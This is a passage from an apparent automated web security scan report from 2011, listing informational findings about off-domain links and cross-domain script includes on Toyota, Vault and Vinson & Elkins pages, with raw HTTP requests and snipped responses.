Last-Modified: Thu, 23 Dec 2010 14:09:30 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</b> is a Houston, Texas-based "worldwide operation with over 700 lawyers in 11 offices across the globe." <a href="http://www.vinson-elkins.com/overview/overview.asp" class="external autonumber" title="http://www.vinson-elkins.com/overview/overview.asp" rel="nofollow">[1]</a>
...[SNIP]...
onmental metrics, green building, electronic waste, Clear Skies and air quality, stewardship and sustainability. He also represented the White House at the COP6 bis in Bonn in 2001 on climate change." <a href="http://www.vinson-elkins.com/lawyers/lawyer_detail.asp?H4AttyID=000322375301" class="external autonumber" title="http://www.vinson-elkins.com/lawyers/lawyer_detail.asp?H4AttyID=000322375301" rel="nofollow">[2]</a>
...[SNIP]...
</a> the "National Good Government Fund", a qualifying non-party PAC, <a href="http://www.leadershipinstitute.org/pac/detailPAC.cfm?id=C00032797" class="external text" title="http://www.leadershipinstitute.org/pac/detailPAC.cfm?id=C00032797" rel="nofollow">contributed</a>
...[SNIP]...
<br />
Web: <a href="http://www.vinson-elkins.com" class="external free" title="http://www.vinson-elkins.com" rel="nofollow">http://www.vinson-elkins.com</a>
...[SNIP]...
<li><a href="http://www.tpj.org/page_view.jsp?pageid=103&pubid=46" class="external text" title="http://www.tpj.org/page_view.jsp?pageid=103&pubid=46" rel="nofollow">"Dollar Docket #18: High Court's Top Donor Bucks Disclosure Law. Vinson & Elkins' PAC disclosures incomplete,"</a>
...[SNIP]...
<li><a href="http://www.tpj.org/page_view.jsp?pageid=97&pubid=40" class="external text" title="http://www.tpj.org/page_view.jsp?pageid=97&pubid=40" rel="nofollow">"Dollar Docket #24: High Court Candidates Raise $1 Million A Seat. TLR, TMA, big firms lead donors,"</a>
...[SNIP]...
<li>Nathan Newman, <a href="http://www.knowthecandidates.org/ktc/BushGang/albertogonzalesexpose.htm" class="external text" title="http://www.knowthecandidates.org/ktc/BushGang/albertogonzalesexpose.htm" rel="nofollow">"Alberto Gonzales, White House General Counsel. Controversy Surrounds Texas Justices Acceptance of Donations and Rulings for Cheney Firm,</a>
...[SNIP]...
</a>, <a href="http://www.newsmax.com/articles/?a=1996/8/07/222330" class="external text" title="http://www.newsmax.com/articles/?a=1996/8/07/222330" rel="nofollow">"Ex-Prosecutor Moves to Firm Tied to Whitewater,"</a>
...[SNIP]...
<li><a href="http://www.opensecrets.org/pressreleases/july22_99_release.htm" class="external text" title="http://www.opensecrets.org/pressreleases/july22_99_release.htm" rel="nofollow">"Bundles Proliferate in Latest Presidential Filings. Bush Leads the Pack with Ten Firms Giving $70,000 or More,"</a>
...[SNIP]...
<li>David Lazarus, <a href="http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2002/02/15/BU132842.DTL" class="external text" title="http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2002/02/15/BU132842.DTL" rel="nofollow">"Spotlight on Enron's law firm,"</a>
...[SNIP]...
<li>kos, <a href="http://www.dailykos.com/story/2004/4/22/1551/39504" class="external text" title="http://www.dailykos.com/story/2004/4/22/1551/39504" rel="nofollow">"More on O'Neill and Margaret Wilson,"</a>
...[SNIP]...
<li id="n-Please-Donate"><a href="https://salsa.democracyinaction.org/o/632/t/10397/shop/custom.jsp?donate_page_KEY=6325">Please Donate</a>
...[SNIP]...
<li id="n-About-PRWatch"><a href="http://www.prwatch.org/cmd/Help+Fight+Spin">About PRWatch</a>
...[SNIP]...
<li id="n-About-the-Center-for-Media-.26-Democracy"><a href="http://www.prwatch.org/cmd/index.html">About the Center for Media & Democracy</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="f-poweredbyico"><a href="http://www.mediawiki.org/"><img src="/skins/common/images/poweredby_mediawiki_88x31.png" alt="Powered by MediaWiki" />
...[SNIP]...
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

14.18. http://www.toyota.com/Specials/specialOffersPage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/Specials/specialOffersPage.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.toyota.com/Specials/specialOffersPage.aspx?siteid=tcom_hp_mktlnk_ShopCurrentOffers

The response contains the following link to another domain:

http://www.buyatoyota.com/?s_van=http://www.toyota.com/Specials&ref=

Request

GET /Specials/specialOffersPage.aspx?siteid=tcom_hp_mktlnk_ShopCurrentOffers HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www.buyatoyota.com?s_van=http://www.toyota.com/Specials&ref=
Content-Length: 255
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Expires: Fri, 21 Jan 2011 19:54:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:54:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.buyatoyota.com?s_van=http://www.toyota.com/Specials&ref=">here</a>
...[SNIP]...

14.19. http://www.toyota.com/owners/apps/maintenance-guides.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/owners/apps/maintenance-guides.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.toyota.com/owners/apps/maintenance-guides.do?siteid=tcom_btmnav_owners_scheduledmaintenance

The response contains the following links to other domains:

http://twitter.com/toyota
http://www.buyatoyota.com/NationalLanding.aspx
http://www.facebook.com/toyota
http://www.toyotacertified.com/
http://www.toyotafinancial.com/consumer/tfs.portal
http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=bk_PaymentEstimator&_nfls=true&external=true&referrer=TYT
http://www.toyotamobility.com/index.html
http://www.toyotaracing.com/
http://www.youtube.com/ToyotaUSA
https://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHome&_nfls=true&referrer=TYT

Request

GET /owners/apps/maintenance-guides.do?siteid=tcom_btmnav_owners_scheduledmaintenance HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Expires: Fri, 21 Jan 2011 19:53:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID_TOYOWN=ZBN1N5kRQWyyk34L245XvDFQcccTTq8GFWfnJZXkn1ML6vnH5Js5!1383648285; path=/
Content-Length: 68206

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<li class="even">
                   <a id="global_local_specials" href="http://www.buyatoyota.com/NationalLanding.aspx" target="_blank">Local Specials</a>
...[SNIP]...
<li class="even">
               <a href="http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=bk_PaymentEstimator&_nfls=true&external=true&referrer=TYT" target="_blank" id="bottomnav_shopping_EstimatePayments">
                   Estimate Payments
               </a>
...[SNIP]...
<li class="even">
               <a href="https://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHome&_nfls=true&referrer=TYT" target="_blank" >
                   My TFS Account
               </a>
...[SNIP]...
<li class="even">
       <a href="http://www.toyotacertified.com/" target="_blank" >
           Toyota Certified Used Vehicles
       </a>
...[SNIP]...
<li class="even">
   <a href="http://www.toyotaracing.com/" target="_blank">
       Toyota Racing
   </a>
...[SNIP]...
<li class="even">
           <a href="http://www.toyotamobility.com/index.html" target="_blank">
               Toyota Mobility Program
           </a>
...[SNIP]...
</a>
     
    <a href="http://www.facebook.com/toyota" target="_blank" style="text-decoration: none;" >
       <img src="/pub-share/img/mytoyota/redesign/facebook_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a>
    <a href="http://twitter.com/toyota" target="_blank" style="text-decoration: none;" >
       <img src="/pub-share/img/mytoyota/redesign/twitter_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a>
    <a href="http://www.youtube.com/ToyotaUSA" target="_blank" style="text-decoration: none;">
       <img src="/pub-share/img/mytoyota/redesign/U_tube_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a> |
       <a href="http://www.toyotafinancial.com/consumer/tfs.portal" class="footer_copy_a" target="_blank">TOYOTA FINANCIAL SERVICES</a>
...[SNIP]...

14.20. http://www.toyota.com/owners/apps/manuals.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/owners/apps/manuals.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.toyota.com/owners/apps/manuals.do?siteid=too_toyota_manuals

The response contains the following links to other domains:

http://twitter.com/toyota
http://www.buyatoyota.com/NationalLanding.aspx
http://www.facebook.com/toyota
http://www.toyotacertified.com/
http://www.toyotafinancial.com/consumer/tfs.portal
http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=bk_PaymentEstimator&_nfls=true&external=true&referrer=TYT
http://www.toyotamobility.com/index.html
http://www.toyotaracing.com/
http://www.youtube.com/ToyotaUSA
https://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHome&_nfls=true&referrer=TYT

Request

GET /owners/apps/manuals.do?siteid=too_toyota_manuals HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Expires: Fri, 21 Jan 2011 19:53:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID_TOYOWN=7BVSN5kTxvfKXnk2NQTyyL1y5Lsl6Rvd2Y2KQlCmfL5QMGW155hQ!251098632; path=/
Content-Length: 34028

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<li class="even">
                   <a id="global_local_specials" href="http://www.buyatoyota.com/NationalLanding.aspx" target="_blank">Local Specials</a>
...[SNIP]...
<li class="even">
               <a href="http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=bk_PaymentEstimator&_nfls=true&external=true&referrer=TYT" target="_blank" id="bottomnav_shopping_EstimatePayments">
                   Estimate Payments
               </a>
...[SNIP]...
<li class="even">
               <a href="https://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHome&_nfls=true&referrer=TYT" target="_blank" >
                   My TFS Account
               </a>
...[SNIP]...
<li class="even">
       <a href="http://www.toyotacertified.com/" target="_blank" >
           Toyota Certified Used Vehicles
       </a>
...[SNIP]...
<li class="even">
   <a href="http://www.toyotaracing.com/" target="_blank">
       Toyota Racing
   </a>
...[SNIP]...
<li class="even">
           <a href="http://www.toyotamobility.com/index.html" target="_blank">
               Toyota Mobility Program
           </a>
...[SNIP]...
</a>
     
    <a href="http://www.facebook.com/toyota" target="_blank" style="text-decoration: none;" >
       <img src="/pub-share/img/mytoyota/redesign/facebook_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a>
    <a href="http://twitter.com/toyota" target="_blank" style="text-decoration: none;" >
       <img src="/pub-share/img/mytoyota/redesign/twitter_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a>
    <a href="http://www.youtube.com/ToyotaUSA" target="_blank" style="text-decoration: none;">
       <img src="/pub-share/img/mytoyota/redesign/U_tube_logo.jpg" width="16" height="30" border="0" />
...[SNIP]...
</a> |
       <a href="http://www.toyotafinancial.com/consumer/tfs.portal" class="footer_copy_a" target="_blank">TOYOTA FINANCIAL SERVICES</a>
...[SNIP]...

14.21. http://www.toyotafinancial.com/consumer/tfs.portal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/tfs.portal

Issue detail

The page was loaded from a URL containing a query string:

http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator

The response contains the following links to other domains:

http://ad.doubleclick.net/adj/N2724.deduped_spotlight/B3720575.3;abr=!ie;sz=1x1;TAG=TFS_Total_Qualified_Traffic;ord=%n?
http://www.toyota.com/

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: ofsc=Sqg8N5JMcDWfGQfQzvnPB9JVL2Y2lGB1DT89xfDpn1k25JlvJ7Y9!2112344406!-1300457433; path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>

<title >Toyota Financial Services: Estimate Monthly Payme
...[SNIP]...
</a>
|

<a href="http://www.toyota.com" class="h" target="_blank" style="text-decoration: none;">
Toyota.com
</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://ad.doubleclick.net/adj/N2724.deduped_spotlight/B3720575.3;abr=!ie;sz=1x1;TAG=TFS_Total_Qualified_Traffic;ord=%n?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

14.22. http://www.toyotafinancial.com/consumer/tfs.portal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/tfs.portal

Issue detail

The page was loaded from a URL containing a query string:

http://www.toyotafinancial.com/consumer/tfs.portal?referrer=TYT

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=1270268;dcnet=4155;boom=16839;sz=1x1;ord=1?
http://ad.doubleclick.net/adj/N2724.deduped_spotlight/B3720575;abr=!ie;sz=1x1;TAG=TFS_Homepage_Traffic;ord=%n?
http://www.toyota.com/

Request

GET /consumer/tfs.portal?referrer=TYT HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:54:40 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>

<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
</a>
|
<a href="http://www.toyota.com" target="_default" class="b">
Toyota.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://ad.doubleclick.net/adj/N2724.deduped_spotlight/B3720575;abr=!ie;sz=1x1;TAG=TFS_Homepage_Traffic;ord=%n?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

<img src="http://ad.doubleclick.net/activity;src=1270268;dcnet=4155;boom=16839;sz=1x1;ord=1?"width=1 height=1 border=0>

...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://ad.doubleclick.net/adj/N2724.deduped_spotlight/B3720575;abr=!ie;sz=1x1;TAG=TFS_Homepage_Traffic;ord=%n?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

14.23. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page was loaded from a URL containing a query string:

http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421

The response contains the following links to other domains:

http://cdn.gigya.com/JS/socialize.js?apikey=null
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php
http://www.addthis.com/bookmark.php?v=250&username=vaultaddthisuser

Request

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:07 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000Teb9VfCYzGhr2FZKSSc1gr-:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:10 GMT;path=/
Content-Length: 92849

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</script>

   <SCRIPT type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=null" >
   </SCRIPT>
...[SNIP]...
<div class="tool-email">
       <a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421" addthis:title="http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421']);">
       <img src="/images/icons/email.png" width="25" height="21" border="0" alt="Email" />
...[SNIP]...
<div class="tool-share">
       <a class="addthis_button" addthis:url="http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421" addthis:title="http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP" href="http://www.addthis.com/bookmark.php?v=250&username=vaultaddthisuser" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Share', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421']);">
       <img src="/images/icons/share.png" width="20" height="21" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vaultaddthisuser"></script>
...[SNIP]...
</script>

<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

14.24. http://www.velaw.com/lawyers/lawyersearch.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.velaw.com
Path:	/lawyers/lawyersearch.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.velaw.com/lawyers/lawyersearch.aspx?id=1134

The response contains the following link to another domain:

http://twitter.com/vinsonandelkins

Request

GET /lawyers/lawyersearch.aspx?id=1134 HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:35:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Vinson &
...[SNIP]...
<td><a href="http://twitter.com/vinsonandelkins"><img title="Twitter" alt="Twitter" src="/uploadedImages/VEsite/Careers/twitter.jpg" align="left" border="0" />
...[SNIP]...

15. Cross-domain script include previous next
There are 439 instances of this issue:

http://www.100kcrossing.com/
http://www.accountingcrossing.com/
http://www.accountmanagementcrossing.com/
http://www.actuarialcrossing.com/
http://www.admincrossing.com/
http://www.advertisingcrossing.com/
http://www.aerospacecrossing.com/
http://www.agriculturalcrossing.com/
http://www.aharrisonbarnes.com/
http://www.aharrisonbarnes.com/contact-us/script/functions.js
http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/
http://www.aharrisonbarnes.com/hb-course/
http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/
http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen
http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/javascript/ad.js
http://www.answers.com/topic/vinson-elkins-llp
http://www.architecturecrossing.com/
http://www.attorneyresume.com/
http://www.auditorcrossing.com/
http://www.automotivecrossing.com/
http://www.aviationcrossing.com/
http://www.bcgsearch.com/
http://www.bilingualcrossing.com/
http://www.biotechcrossing.com/
http://www.bluecollarcrossing.com/
http://www.bmwactivatethefuture.com/
http://www.bmwusa.com/
http://www.bmwusa.com/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx
